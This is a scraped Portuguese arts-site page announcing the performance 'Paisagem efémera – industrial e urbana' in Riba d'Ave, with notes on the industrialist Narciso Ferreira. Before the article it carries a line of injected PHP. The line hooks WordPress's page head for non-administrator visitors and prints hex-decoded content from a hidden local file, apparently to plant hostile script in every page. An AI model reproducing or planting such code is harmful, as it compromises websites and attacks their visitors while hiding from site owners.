if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Paisagem efémera – industrial e urbana - artesentreasletras.com.pt

Paisagem efémera – industrial e urbana

Paisagem efémera – industrial e urbana

D.R.

A obra e legado de Narciso Ferreira, considerado um dos maiores industriais nacionais, continua a fazer-se sentir pelas ruas de Riba d’Ave. Da fábrica têxtil, à escola primária, passando pelo mercado, teatro, estalagem, correios, sem esquecer o quartel de bombeiros, a sua presença nesta freguesia de Vila Nova de Famalicão é quase como que “omnipresente”, tal como a do rio que a percorre na sua margem esquerda: o Rio Ave. É nesta relação, que espelha o impacto que a indústria tem sobre o rio, que o segundo ato de Paisagem Efémera – industrial e urbana se irá debruçar. O espetáculo, que irá percorrer o Antigo Quartel de Bombeiros de Riba d’Ave, estreia-se já a 21 de outubro e fica em cena até 24 de outubro.